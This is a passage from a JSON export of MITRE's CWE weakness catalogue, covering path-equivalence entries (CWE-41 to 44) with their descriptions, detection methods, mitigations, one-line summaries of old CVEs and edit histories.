Traversal"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, &#34;Filelike Objects&#34;, Page 664"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Windows UNC Share - \'\\\\\\\\UNC\\\\share\\\\name\\\\\'","attr":{"@_Date":"2008-04-11"}}}},"41":{"attr":{"@_ID":"41","@_Name":"Improper Resolution of Path Equivalence","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The system or application is vulnerable to file system contents disclosure through path equivalence. Path equivalence involves the use of special characters in file and directory names. The associated manipulations are intended to generate multiple names for the same object.","Extended_Description":"Path equivalence is usually employed in order to circumvent access controls expressed using an incomplete set of file name or file path representations. This is different from path traversal, wherein the manipulations are performed to generate a name for a different object.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Files or Directories","Modify Files or Directories","Bypass Protection Mechanism"],"Note":"An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpected files. If the files are used for a security mechanism than an attacker may be able to bypass the mechanism."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1114","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1114"},{"Reference":"CVE-2002-1986","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1986"},{"Reference":"CVE-2004-2213","Description":"Source code disclosure using trailing dot or trailing encoding space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2213"},{"Reference":"CVE-2005-3293","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3293"},{"Reference":"CVE-2004-0061","Description":"Bypass directory access restrictions using trailing dot in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0061"},{"Reference":"CVE-2000-1133","Description":"Bypass directory access restrictions using trailing dot in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1133"},{"Reference":"CVE-2001-1386","Description":"Bypass check for \\".lnk\\" extension using \\".lnk.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386"},{"Reference":"CVE-2001-0693","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0693"},{"Reference":"CVE-2001-0778","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0778"},{"Reference":"CVE-2001-1248","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1248"},{"Reference":"CVE-2004-0280","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0280"},{"Reference":"CVE-2005-0622","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0622"},{"Reference":"CVE-2005-1656","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1656"},{"Reference":"CVE-2002-1603","Description":"Source disclosure via trailing encoded space \\"%20\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1603"},{"Reference":"CVE-2001-0054","Description":"Multi-Factor Vulnerability (MVF). directory traversal and other issues in FTP server using Web encodings such as \\"%20\\"; certain manipulations have unusual side effects.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0054"},{"Reference":"CVE-2002-1451","Description":"Trailing space (\\"+\\" in query string) leads to source code disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1451"},{"Reference":"CVE-2000-0293","Description":"Filenames with spaces allow arbitrary file deletion when the product does not properly quote them; some overlap with path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0293"},{"Reference":"CVE-2001-1567","Description":"\\"+\\" characters in query string converted to spaces before sensitive file/extension (internal space), leading to bypass of access restrictions to the file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1567"},{"Reference":"CVE-2002-0253","Description":"Overlaps infoleak","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0253"},{"Reference":"CVE-2001-0446","Description":"Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0446"},{"Reference":"CVE-2004-0334","Description":"Bypass Basic Authentication for files using trailing \\"/\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0334"},{"Reference":"CVE-2001-0893","Description":"Read sensitive files with trailing \\"/\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0893"},{"Reference":"CVE-2001-0892","Description":"Web server allows remote attackers to view sensitive files under the document root (such as .htpasswd) via a GET request with a trailing /.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0892"},{"Reference":"CVE-2004-1814","Description":"Directory traversal vulnerability in server allows remote attackers to read protected files via .. (dot dot) sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1814"},{"Reference":"BID:3518","Description":"Source code disclosure","Link":"http://www.securityfocus.com/bid/3518"},{"Reference":"CVE-2002-1483","Description":"Read files with full pathname using multiple internal slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"},{"Reference":"CVE-1999-1456","Description":"Server allows remote attackers to read arbitrary files via a GET request with more than one leading / (slash) character in the filename.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1456"},{"Reference":"CVE-2004-0578","Description":"Server allows remote attackers to read arbitrary files via leading slash (//) characters in a URL request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0578"},{"Reference":"CVE-2002-0275","Description":"Server allows remote attackers to bypass authentication and read restricted files via an extra / (slash) in the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0275"},{"Reference":"CVE-2004-1032","Description":"Product allows local users to delete arbitrary files or create arbitrary empty files via a target filename with a large number of leading slash (/) characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1032"},{"Reference":"CVE-2002-1238","Description":"Server allows remote attackers to bypass access restrictions for files via an HTTP request with a sequence of multiple / (slash) characters such as http://www.example.com///file/.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1238"},{"Reference":"CVE-2004-1878","Description":"Product allows remote attackers to bypass authentication, obtain sensitive information, or gain access via a direct request to admin/user.pl preceded by // (double leading slash).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1878"},{"Reference":"CVE-2005-1365","Description":"Server allows remote attackers to execute arbitrary commands via a URL with multiple leading \\"/\\" (slash) characters and \\"..\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1365"},{"Reference":"CVE-2000-1050","Description":"Access directory using multiple leading slash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1050"},{"Reference":"CVE-2001-1072","Description":"Bypass access restrictions via multiple leading slash, which causes a regular expression to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1072"},{"Reference":"CVE-2004-0235","Description":"Archive extracts to arbitrary files using multiple leading slash in filenames in the archive.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0235"},{"Reference":"CVE-2002-1078","Description":"Directory listings in web server using multiple trailing slash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1078"},{"Reference":"CVE-2004-0847","Description":"ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) \\"\\\\\\" (backslash) or (2) \\"%5C\\" (encoded backslash), aka \\"Path Validation Vulnerability.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847"},{"Reference":"CVE-2000-0004","Description":"Server allows remote attackers to read source code for executable files by inserting a . (dot) into the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0004"},{"Reference":"CVE-2002-0304","Description":"Server allows remote attackers to read password-protected files via a /./ in the HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0304"},{"Reference":"BID:6042","Description":"Input Validation error","Link":"http://www.securityfocus.com/bid/6042"},{"Reference":"CVE-1999-1083","Description":"Possibly (could be a cleansing error)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1083"},{"Reference":"CVE-2004-0815","Description":"\\"/./////etc\\" cleansed to \\".///etc\\" then \\"/etc\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815"},{"Reference":"CVE-2002-0112","Description":"Server allows remote attackers to view password protected files via /./ in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0112"},{"Reference":"CVE-2004-0696","Description":"List directories using desired path and \\"*\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0696"},{"Reference":"CVE-2002-0433","Description":"List files in web server using \\"*.ext\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"},{"Reference":"CVE-2001-1152","Description":"Proxy allows remote attackers to bypass denylist restrictions and connect to unauthorized web servers by modifying the requested URL, including (1) a // (double slash), (2) a /SUBDIR/.. where the desired file is in the parentdir, (3) a /./, or (4) URL-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1152"},{"Reference":"CVE-2000-0191","Description":"application check access for restricted URL before canonicalization","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191"},{"Reference":"CVE-2005-1366","Description":"CGI source disclosure using \\"dirname/../cgi-bin\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1366"},{"Reference":"CVE-1999-0012","Description":"Multiple web servers allow restriction bypass using 8.3 names instead of long names","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0012"},{"Reference":"CVE-2001-0795","Description":"Source code disclosure using 8.3 file name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0795"},{"Reference":"CVE-2005-0471","Description":"Multi-Factor Vulnerability. Product generates temporary filenames using long filenames, which become predictable in 8.3 format.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0471"}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Path Equivalence"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO02-C","Entry_Name":"Canonicalize path names originating from untrusted sources"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"3"}}},"Notes":{"Note":{"#text":"Some of these manipulations could be effective in path traversal issues, too.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Path Equivalence","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Path Equivalence","attr":{"@_Date":"2009-05-27"}}]}},"42":{"attr":{"@_ID":"42","@_Name":"Path Equivalence: \'filename.\' (Trailing Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of trailing dot (\'filedir.\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1114","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1114"},{"Reference":"CVE-2002-1986","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1986"},{"Reference":"CVE-2004-2213","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2213"},{"Reference":"CVE-2005-3293","Description":"Source code disclosure using trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3293"},{"Reference":"CVE-2004-0061","Description":"Bypass directory access restrictions using trailing dot in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0061"},{"Reference":"CVE-2000-1133","Description":"Bypass directory access restrictions using trailing dot in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1133"},{"Reference":"CVE-2001-1386","Description":"Bypass check for \\".lnk\\" extension using \\".lnk.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Trailing Dot - \'filedir.\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Trailing Dot - \'filedir.\'","attr":{"@_Date":"2008-04-11"}}}},"43":{"attr":{"@_ID":"43","@_Name":"Path Equivalence: \'filename....\' (Multiple Trailing Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple trailing dot (\'filedir....\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"42","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"163","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"BUGTRAQ:20040205","Description":"Apache + Resin Reveals JSP Source Code ...","Link":"http://marc.info/?l=bugtraq&amp;m=107605633904122&amp;w=2"},{"Reference":"CVE-2004-0281","Description":"Multiple trailing dot allows directory listing","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0281"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Trailing Dot - \'filedir....\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Trailing Dot - \'filedir....\'","attr":{"@_Date":"2008-04-11"}}}},"44":{"attr":{"@_ID":"44","@_Name":"Path Equivalence: \'file.name\' (Internal Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of internal dot (\'file.ordir\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Internal Dot - \'file.ordir\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"An improper attempt to remove the internal dots from the string could lead to CWE-181 (Incorrect Behavior Order: Validate Before Filter).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated 